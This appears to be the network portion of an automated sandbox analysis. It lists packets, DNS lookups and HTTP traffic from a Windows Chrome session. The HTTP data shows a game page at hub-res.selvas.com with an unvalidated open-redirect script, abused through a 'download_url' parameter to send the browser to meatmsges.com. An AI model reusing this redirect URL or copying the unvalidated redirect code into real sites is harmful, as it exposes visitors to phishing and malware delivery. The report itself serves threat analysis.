Oct 2, 2024 18:44:35.553956032 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:35.553999901 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:35.554003954 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.554313898 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.554354906 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:35.581794024 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:35.581808090 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:36.712563038 CEST	49705	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:36.712898016 CEST	49705	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:36.713516951 CEST	49730	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:36.713567972 CEST	443	49730	173.222.162.64	192.168.2.6
Oct 2, 2024 18:44:36.713634968 CEST	49730	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:36.714742899 CEST	49730	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:36.714757919 CEST	443	49730	173.222.162.64	192.168.2.6
Oct 2, 2024 18:44:36.717550039 CEST	443	49705	173.222.162.64	192.168.2.6
Oct 2, 2024 18:44:36.717684031 CEST	443	49705	173.222.162.64	192.168.2.6
Oct 2, 2024 18:44:37.057476997 CEST	443	49722	142.250.186.132	192.168.2.6
Oct 2, 2024 18:44:37.057616949 CEST	443	49722	142.250.186.132	192.168.2.6
Oct 2, 2024 18:44:37.057900906 CEST	49722	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:44:37.337820053 CEST	443	49730	173.222.162.64	192.168.2.6
Oct 2, 2024 18:44:37.337892056 CEST	49730	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:38.334300995 CEST	49722	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:44:38.334357977 CEST	443	49722	142.250.186.132	192.168.2.6
Oct 2, 2024 18:44:43.826483965 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:43.826534033 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:43.826631069 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:43.827842951 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:43.827857018 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:44.636117935 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:44.636223078 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:44.646542072 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:44.646555901 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:44.647018909 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:44.656485081 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:44.656485081 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:44.656507015 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:44.657120943 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:44.699404955 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:44.833113909 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:44.833614111 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:44.833715916 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:44.855803013 CEST	49731	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:44.855837107 CEST	443	49731	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:46.580425978 CEST	443	49720	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:46.580518961 CEST	443	49720	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:46.580611944 CEST	49720	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:47.654716015 CEST	80	49717	52.219.162.147	192.168.2.6
Oct 2, 2024 18:44:47.654778004 CEST	49717	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:47.765899897 CEST	80	49716	52.219.162.147	192.168.2.6
Oct 2, 2024 18:44:47.765990019 CEST	49716	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:48.380114079 CEST	49717	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:48.380235910 CEST	49716	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:48.380273104 CEST	49720	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:48.380311966 CEST	443	49720	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:48.385008097 CEST	80	49717	52.219.162.147	192.168.2.6
Oct 2, 2024 18:44:48.385055065 CEST	80	49716	52.219.162.147	192.168.2.6
Oct 2, 2024 18:44:56.624408007 CEST	443	49730	173.222.162.64	192.168.2.6
Oct 2, 2024 18:44:56.624478102 CEST	49730	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:45:03.235583067 CEST	49732	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:03.235682011 CEST	443	49732	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:03.235765934 CEST	49732	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:03.237090111 CEST	49732	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:03.237117052 CEST	443	49732	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:04.316818953 CEST	443	49732	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:04.316983938 CEST	49732	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:04.342159033 CEST	49732	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:04.342179060 CEST	443	49732	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:04.342552900 CEST	443	49732	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:04.346730947 CEST	49732	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:04.346791029 CEST	49732	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:04.346796036 CEST	443	49732	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:04.346975088 CEST	49732	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:04.387409925 CEST	443	49732	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:04.534220934 CEST	443	49732	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:04.534482956 CEST	443	49732	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:04.534559965 CEST	49732	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:04.534703970 CEST	49732	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:04.534728050 CEST	443	49732	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:12.208439112 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:12.208487988 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:12.208578110 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:12.209028959 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:12.209036112 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.069329023 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.069458008 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:13.144743919 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:13.144768953 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.145102978 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.155826092 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:13.203391075 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.423629999 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.423651934 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.423666954 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.423757076 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:13.423764944 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.423810959 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:13.424071074 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.424133062 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:13.424133062 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.424154997 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.424204111 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:13.424876928 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.424918890 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:13.424978018 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:13.428302050 CEST	49733	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:45:13.428314924 CEST	443	49733	4.175.87.197	192.168.2.6
Oct 2, 2024 18:45:26.550486088 CEST	49735	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:45:26.550590038 CEST	443	49735	142.250.186.132	192.168.2.6
Oct 2, 2024 18:45:26.550693035 CEST	49735	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:45:26.551532030 CEST	49735	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:45:26.551570892 CEST	443	49735	142.250.186.132	192.168.2.6
Oct 2, 2024 18:45:27.241084099 CEST	443	49735	142.250.186.132	192.168.2.6
Oct 2, 2024 18:45:27.241415977 CEST	49735	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:45:27.241487026 CEST	443	49735	142.250.186.132	192.168.2.6
Oct 2, 2024 18:45:27.241792917 CEST	443	49735	142.250.186.132	192.168.2.6
Oct 2, 2024 18:45:27.242147923 CEST	49735	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:45:27.242223978 CEST	443	49735	142.250.186.132	192.168.2.6
Oct 2, 2024 18:45:27.282635927 CEST	49735	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:45:29.786523104 CEST	49736	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:29.786581993 CEST	443	49736	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:29.786712885 CEST	49736	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:29.792599916 CEST	49736	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:29.792634964 CEST	443	49736	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:30.580801964 CEST	443	49736	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:30.580915928 CEST	49736	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:30.584642887 CEST	49736	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:30.584687948 CEST	443	49736	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:30.584990978 CEST	443	49736	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:30.588313103 CEST	49736	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:30.588376999 CEST	49736	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:30.588392019 CEST	443	49736	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:30.588746071 CEST	49736	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:30.635396957 CEST	443	49736	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:30.764981985 CEST	443	49736	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:30.765202045 CEST	443	49736	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:30.765302896 CEST	49736	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:30.765403032 CEST	49736	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:30.765448093 CEST	443	49736	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:37.096779108 CEST	443	49735	142.250.186.132	192.168.2.6
Oct 2, 2024 18:45:37.096930981 CEST	443	49735	142.250.186.132	192.168.2.6
Oct 2, 2024 18:45:37.097007036 CEST	49735	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:45:38.332453012 CEST	49735	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:45:38.332526922 CEST	443	49735	142.250.186.132	192.168.2.6
Oct 2, 2024 18:45:54.114594936 CEST	49704	80	192.168.2.6	88.221.110.91
Oct 2, 2024 18:45:54.301420927 CEST	80	49704	88.221.110.91	192.168.2.6
Oct 2, 2024 18:45:54.301529884 CEST	49704	80	192.168.2.6	88.221.110.91
Oct 2, 2024 18:45:58.683165073 CEST	49739	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:58.683263063 CEST	443	49739	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:58.683413029 CEST	49739	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:58.684053898 CEST	49739	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:58.684101105 CEST	443	49739	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:59.574317932 CEST	443	49739	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:59.574414015 CEST	49739	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:59.581299067 CEST	49739	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:59.581361055 CEST	443	49739	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:59.582097054 CEST	443	49739	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:59.591718912 CEST	49739	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:59.591897011 CEST	49739	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:59.591924906 CEST	443	49739	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:59.592134953 CEST	49739	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:59.639405966 CEST	443	49739	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:59.764556885 CEST	443	49739	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:59.764893055 CEST	443	49739	40.115.3.253	192.168.2.6
Oct 2, 2024 18:45:59.765021086 CEST	49739	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:59.765453100 CEST	49739	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:45:59.765472889 CEST	443	49739	40.115.3.253	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 18:44:22.032423973 CEST	53	53095	1.1.1.1	192.168.2.6
Oct 2, 2024 18:44:22.071180105 CEST	53	61626	1.1.1.1	192.168.2.6
Oct 2, 2024 18:44:23.179918051 CEST	53	57944	1.1.1.1	192.168.2.6
Oct 2, 2024 18:44:23.806823969 CEST	52684	53	192.168.2.6	1.1.1.1
Oct 2, 2024 18:44:23.807037115 CEST	63418	53	192.168.2.6	1.1.1.1
Oct 2, 2024 18:44:23.883490086 CEST	53	52684	1.1.1.1	192.168.2.6
Oct 2, 2024 18:44:23.931577921 CEST	53	63418	1.1.1.1	192.168.2.6
Oct 2, 2024 18:44:25.979691029 CEST	55639	53	192.168.2.6	1.1.1.1
Oct 2, 2024 18:44:25.982228994 CEST	49493	53	192.168.2.6	1.1.1.1
Oct 2, 2024 18:44:25.993221045 CEST	53	55639	1.1.1.1	192.168.2.6
Oct 2, 2024 18:44:25.996038914 CEST	53	49493	1.1.1.1	192.168.2.6
Oct 2, 2024 18:44:26.504441023 CEST	63793	53	192.168.2.6	1.1.1.1
Oct 2, 2024 18:44:26.505063057 CEST	50506	53	192.168.2.6	1.1.1.1
Oct 2, 2024 18:44:26.511167049 CEST	53	63793	1.1.1.1	192.168.2.6
Oct 2, 2024 18:44:26.511953115 CEST	53	50506	1.1.1.1	192.168.2.6
Oct 2, 2024 18:44:40.198234081 CEST	53	54403	1.1.1.1	192.168.2.6
Oct 2, 2024 18:44:59.431885004 CEST	53	59437	1.1.1.1	192.168.2.6
Oct 2, 2024 18:45:21.687859058 CEST	53	56530	1.1.1.1	192.168.2.6
Oct 2, 2024 18:45:22.213464022 CEST	53	60809	1.1.1.1	192.168.2.6
Oct 2, 2024 18:45:49.616619110 CEST	53	59470	1.1.1.1	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Oct 2, 2024 18:44:23.931668043 CEST	192.168.2.6	1.1.1.1	c270	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 18:44:23.806823969 CEST	192.168.2.6	1.1.1.1	0x30f0	Standard query (0)	hub-res.selvas.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:23.807037115 CEST	192.168.2.6	1.1.1.1	0xe0b	Standard query (0)	hub-res.selvas.com	65	IN (0x0001)	false
Oct 2, 2024 18:44:25.979691029 CEST	192.168.2.6	1.1.1.1	0x1e25	Standard query (0)	meatmsges.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:25.982228994 CEST	192.168.2.6	1.1.1.1	0x20ac	Standard query (0)	meatmsges.com	65	IN (0x0001)	false
Oct 2, 2024 18:44:26.504441023 CEST	192.168.2.6	1.1.1.1	0x125b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:26.505063057 CEST	192.168.2.6	1.1.1.1	0x2128	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 18:44:23.883490086 CEST	1.1.1.1	192.168.2.6	0x30f0	No error (0)	hub-res.selvas.com	s3-website-ap-northeast-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 18:44:23.883490086 CEST	1.1.1.1	192.168.2.6	0x30f0	No error (0)	s3-website-ap-northeast-1.amazonaws.com		52.219.162.147	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:23.883490086 CEST	1.1.1.1	192.168.2.6	0x30f0	No error (0)	s3-website-ap-northeast-1.amazonaws.com		52.219.199.99	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:23.883490086 CEST	1.1.1.1	192.168.2.6	0x30f0	No error (0)	s3-website-ap-northeast-1.amazonaws.com		52.219.199.139	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:23.883490086 CEST	1.1.1.1	192.168.2.6	0x30f0	No error (0)	s3-website-ap-northeast-1.amazonaws.com		52.219.16.120	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:23.883490086 CEST	1.1.1.1	192.168.2.6	0x30f0	No error (0)	s3-website-ap-northeast-1.amazonaws.com		52.219.150.227	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:23.883490086 CEST	1.1.1.1	192.168.2.6	0x30f0	No error (0)	s3-website-ap-northeast-1.amazonaws.com		52.219.152.103	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:23.883490086 CEST	1.1.1.1	192.168.2.6	0x30f0	No error (0)	s3-website-ap-northeast-1.amazonaws.com		52.219.200.15	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:23.883490086 CEST	1.1.1.1	192.168.2.6	0x30f0	No error (0)	s3-website-ap-northeast-1.amazonaws.com		52.219.162.23	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:23.931577921 CEST	1.1.1.1	192.168.2.6	0xe0b	No error (0)	hub-res.selvas.com	s3-website-ap-northeast-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 18:44:25.993221045 CEST	1.1.1.1	192.168.2.6	0x1e25	No error (0)	meatmsges.com		185.172.129.102	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:26.511167049 CEST	1.1.1.1	192.168.2.6	0x125b	No error (0)	www.google.com		142.250.186.132	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:26.511953115 CEST	1.1.1.1	192.168.2.6	0x2128	No error (0)	www.google.com			65	IN (0x0001)	false
Oct 2, 2024 18:44:35.200345993 CEST	1.1.1.1	192.168.2.6	0x3211	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 18:44:35.200345993 CEST	1.1.1.1	192.168.2.6	0x3211	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:36.479058027 CEST	1.1.1.1	192.168.2.6	0x1e16	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:36.479058027 CEST	1.1.1.1	192.168.2.6	0x1e16	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:44:55.291461945 CEST	1.1.1.1	192.168.2.6	0x7940	No error (0)	windowsupdatebg.s.llnwi.net		87.248.204.0	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:45:34.777169943 CEST	1.1.1.1	192.168.2.6	0xd63b	No error (0)	windowsupdatebg.s.llnwi.net		178.79.208.1	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:45:34.777169943 CEST	1.1.1.1	192.168.2.6	0xd63b	No error (0)	windowsupdatebg.s.llnwi.net		87.248.202.1	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:46:04.697999001 CEST	1.1.1.1	192.168.2.6	0x3168	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 18:46:04.697999001 CEST	1.1.1.1	192.168.2.6	0x3168	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.18	A (IP address)	IN (0x0001)	false
Oct 2, 2024 18:46:04.697999001 CEST	1.1.1.1	192.168.2.6	0x3168	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.34	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

hub-res.selvas.com

meatmsges.com

fs.microsoft.com

slscr.update.microsoft.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49716	52.219.162.147	80	4916	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 18:44:23.915723085 CEST	496	OUT	GET /market/fatalraid/en/hub.html?download_url=https://meatmsges.com HTTP/1.1 Host: hub-res.selvas.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Oct 2, 2024 18:44:25.346530914 CEST	1236	IN	HTTP/1.1 200 OK x-amz-id-2: oM/ati/myhF3Lu7I1WgDlQ/3EuXzswaq7EFU3DLdFFDnn1n4ei0SPaNkArQZpb2tkMNkrjIzfB8= x-amz-request-id: 2FTB8RRVZ94ZD2EQ Date: Wed, 02 Oct 2024 16:44:25 GMT Last-Modified: Thu, 22 Jun 2017 06:35:39 GMT ETag: "e90527e84cd2692db7fe44b09fb177fa" Content-Type: text/html Server: AmazonS3 Content-Length: 1013 Data Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 4e 6f 2e 31 20 6d 6f 62 69 6c 65 20 46 50 53 20 67 61 6d 65 20 46 41 54 41 4c 20 52 41 49 44 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 2e 31 20 6d 6f 62 69 6c 65 20 46 50 53 20 67 61 6d 65 20 46 41 54 41 4c 20 52 41 49 44 22 3e 0a 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 68 75 62 2d 72 65 73 2e 73 65 6c 76 61 73 2e 63 6f 6d 2f 6d 61 72 6b 65 74 2f 66 61 74 61 6c 72 61 69 64 2f 65 6e 2f 68 75 62 2e 68 74 6d 6c 22 3e 0a 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head><meta charset="UTF-8"><title>No.1 mobile FPS game FATAL RAID</title><meta property="og:type" content="website"><meta property="og:site_name" content="No.1 mobile FPS game FATAL RAID"><meta property="og:url" content="http://hub-res.selvas.com/market/fatalraid/en/hub.html"><meta property="og:title" content="No.1 mobile FPS game FATAL RAID"><meta property="og:image" content="http://hub-res.selvas.com/market/fatalraid/en/img/title.jpg"><meta property="og:description" content="The most realistic gunplay ever!"><meta name="description" content="The most realistic gunplay ever!"><meta http-equiv="X-UA-Compatible" content="IE=edge"></head><body><script>var query = window.location.search.substring(1);var vars = query.split("&");for (var i=0;i<vars.length;i++) {var pair = vars[i].split("=");if(pair[0] == "do
Oct 2, 2024 18:44:25.346570015 CEST	112	IN	Data Raw: 77 6e 6c 6f 61 64 5f 75 72 6c 22 29 20 7b 0a 09 09 09 09 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 70 61 69 72 5b 31 5d 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d Data Ascii: wnload_url") {window.location.href = decodeURIComponent(pair[1]);}}</script></body></html>
Oct 2, 2024 18:44:25.346602917 CEST	112	IN	Data Raw: 77 6e 6c 6f 61 64 5f 75 72 6c 22 29 20 7b 0a 09 09 09 09 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 70 61 69 72 5b 31 5d 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d Data Ascii: wnload_url") {window.location.href = decodeURIComponent(pair[1]);}}</script></body></html>
Oct 2, 2024 18:44:25.346719027 CEST	1236	IN	HTTP/1.1 200 OK x-amz-id-2: oM/ati/myhF3Lu7I1WgDlQ/3EuXzswaq7EFU3DLdFFDnn1n4ei0SPaNkArQZpb2tkMNkrjIzfB8= x-amz-request-id: 2FTB8RRVZ94ZD2EQ Date: Wed, 02 Oct 2024 16:44:25 GMT Last-Modified: Thu, 22 Jun 2017 06:35:39 GMT ETag: "e90527e84cd2692db7fe44b09fb177fa" Content-Type: text/html Server: AmazonS3 Content-Length: 1013 Data Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 4e 6f 2e 31 20 6d 6f 62 69 6c 65 20 46 50 53 20 67 61 6d 65 20 46 41 54 41 4c 20 52 41 49 44 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 2e 31 20 6d 6f 62 69 6c 65 20 46 50 53 20 67 61 6d 65 20 46 41 54 41 4c 20 52 41 49 44 22 3e 0a 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 68 75 62 2d 72 65 73 2e 73 65 6c 76 61 73 2e 63 6f 6d 2f 6d 61 72 6b 65 74 2f 66 61 74 61 6c 72 61 69 64 2f 65 6e 2f 68 75 62 2e 68 74 6d 6c 22 3e 0a 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head><meta charset="UTF-8"><title>No.1 mobile FPS game FATAL RAID</title><meta property="og:type" content="website"><meta property="og:site_name" content="No.1 mobile FPS 